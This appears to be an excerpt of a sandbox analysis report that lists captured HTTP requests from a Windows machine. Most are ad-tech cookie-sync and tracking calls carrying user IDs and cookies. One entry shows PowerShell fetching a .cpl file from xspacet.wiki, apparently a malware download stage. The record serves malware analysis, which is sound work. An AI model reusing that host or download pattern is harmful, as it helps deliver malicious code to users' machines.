Source: global trafficHTTP traffic detected: GET /73c1e1bfc3bde354d60b80e601ae3914.gif?puid=[UID]&redir=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D164%26gdpr%3D0%26gdpr_consent%3D%26uid%3D%5BUID%5D&gdpr=${GDPR}&gdpr_consent=${GDPR_STRING}&ccpa=&coppa= HTTP/1.1Host: cs.admanmedia.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /tap.php?v=223352&nid=4584&put=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: pixel.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /exchange/sync.php?p=onetag&gdpr=0&gdpr_consent= HTTP/1.1Host: pixel-eu.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /match/?int_id=113&gdpr=0&gdpr_consent=&callback=https%3A%2F%2Fs.amazon-adsystem.com%2Fecm3%3Fex%3Donetag.com%26id%3D%24%7BUSER_TOKEN%7D&ot_initiated=1 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11596&gdpr=[GDPR]&gdpr_consent=[USER_CONSENT]&id=8561637051911725247 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /match/?int_id=106&redir=1&ot_initiated=1&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/usync/?gdpr=0&gdpr_consent=&pubId=69f48c2160c8113Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match?bidder=37&buyeruid=OPTOUT&r=Cid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgB HTTP/1.1Host: ssp.disqus.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: zeta-ssp-user-id=ua-a477c4ab-523e-3704-8093-8c5ca34f678b
Source: global trafficHTTP traffic detected: GET /cs?aid=11601&id=67214f0eef092fecdc1ae63b60e4b2&gdpr_consent=&gdpr=0 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /pub/sync?pubid=pub10101531197440&gdpr=0&gdpr_consent= HTTP/1.1Host: t.adx.opera.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11574&id=97dc38d56a HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: geo.privacymanager.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /visitor/bsync?name=risecode&uid=40a3c28f9ffc73ee86df2bac2d2bb390&url=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11609%26id%3D%5BBUYER_ID%5D%0A HTTP/1.1Host: visitor-risecode.omnitagjs.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /px.gif?ch=1&e=0.2778489536815094 HTTP/1.1Host: ad-delivery.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /ul_cb/check_uuid/https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Faid%3D11603%26gdpr%3D%5BGDPR%5D%26gdpr_consent%3D%5BUSER_CONSENT%5D%26uid%3D$%7BBSW_UUID%7D HTTP/1.1Host: x.bidswitch.netConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?p=159706&gdpr=0&gdpr_consent=&us_privacy=&pu=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D114%26gdpr%3D${GDPR}%26gdpr_consent%3D${GDPR_STRING}%26uid%3D%23PMUID&rdf=1 HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11600&id=1192333276257490180&gdpr=0&gdpr_consent= HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /AdServer/ImgSync?gdpr=0&gdpr=0&gdpr_consent=&gdpr_consent=&p=160295&pu=https%3A%2F%2Fcs-server-s2s.yellowblue.io%2Fcs%3Ffwrd%3D1%26aid%3D11576%26id%3D%23PMUID&rdf=1 HTTP/1.1Host: image8.pubmatic.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /stein/ncpa.cpl HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: xspacet.wikiConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /ecm3?ex=onetag.com&id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?int_id=98&uid=8561637051911725247&gdpr=0&gdpr_consent= HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=3&uid=cdc7338a7458e43b3b604d1e1bbecc8c&gdpr_consent=&gdpr=0 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /match/?int_id=107&uid=8751746751128704325 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
Source: global trafficHTTP traffic detected: GET /ul_cb/sync?ssp=onetag&ssp_user_id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4&gdpr=0&gdpr_consent= HTTP/1.1Host: rtb.mfadsrvr.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /khaos.json? HTTP/1.1Host: token.rubiconproject.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: */*Origin: https://eus.rubiconproject.comSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://eus.rubiconproject.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: khaos_p=M7A5IT3R-G-GNOQ; audit_p=1|p3NZOIPdcs7g2WF2nGvUU+SRTrMPTneuTTZKI3TR72YkDyl9IZRjbpAY6ebCcuOOT6F3oGgylxdCbuL7wqM7W24/AOYgyMTzmjbisE4m2Mfme0rGRDIQp2HZvLHXgE7qKreeM+I17A+st7tELqFbcc9dWb1LRf1hfY0V14FIbwNNc4QTpadywtzpQ7vzkXQ/; receive-cookie-deprecation=1
Source: global trafficHTTP traffic detected: GET /cs?fwrd=1&aid=11609&id=25ebd2f2d43075ee712bca45feb772f6 HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /bh/rtset?pid=562985&ev=1&us_privacy=&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D149%26gdpr%3D0%26gdpr_consent%3D%26uid%3D%25%25VGUID%25%25 HTTP/1.1Host: bh.contextweb.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: VP=part_V22NFapzdQQi; pb_rtb_ev_part=3-1wje|8i8.0.1
Source: global trafficHTTP traffic detected: GET /cs?aid=11603&gdpr=[GDPR]&gdpr_consent=[USER_CONSENT]&uid= HTTP/1.1Host: cs-server-s2s.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /user-sync?zone=176971&t=image&gdpr=0&gdpr_consent=&us_privacy=&r=https%3A%2F%2Fssp.disqus.com%2Fmatch%3Fbidder%3D27%26buyeruid%3D%7BUID%7D%26r%3DCid1YS1hNDc3YzRhYi01MjNlLTM3MDQtODA5My04YzVjYTM0ZjY3OGIqYmh0dHBzOi8vY3Mtc2VydmVyLXMycy55ZWxsb3dibHVlLmlvL2NzP2Z3cmQ9MSZhaWQ9MTE2MTImaWQ9dWEtYTQ3N2M0YWItNTIzZS0zNzA0LTgwOTMtOGM1Y2EzNGY2NzhiMgIlGzgC HTTP/1.1Host: sync.adkernel.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://cs-server-s2s.yellowblue.io/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /cs?aid=11581&id=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4 HTTP/1.1Host: cs.yellowblue.ioConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: wrvUserID=z4Tmd3x9kp_s
Source: global trafficHTTP traffic detected: GET /match/bounce/current?version=1&networkId=72582&rurl=https%3A%2F%2Fonetag-sys.com%2Fmatch%2F%3Fint_id%3D90%26gdpr%3D0%26gdpr_consent%3D%26uid%3D HTTP/1.1Host: prebid-match.dotomi.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global trafficHTTP traffic detected: GET /match/?gdpr=0&gdpr_consent=&int_id=168&uid=OPUe4e9ec2f0e244e659552d959c8beec46 HTTP/1.1Host: onetag-sys.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-platform: "Windows"Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://onetag-sys.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8Cookie: OTP=x4HSla-C8F-0K3hnC_hqmnyTkFOSzuiQFnnpxPnX6P4
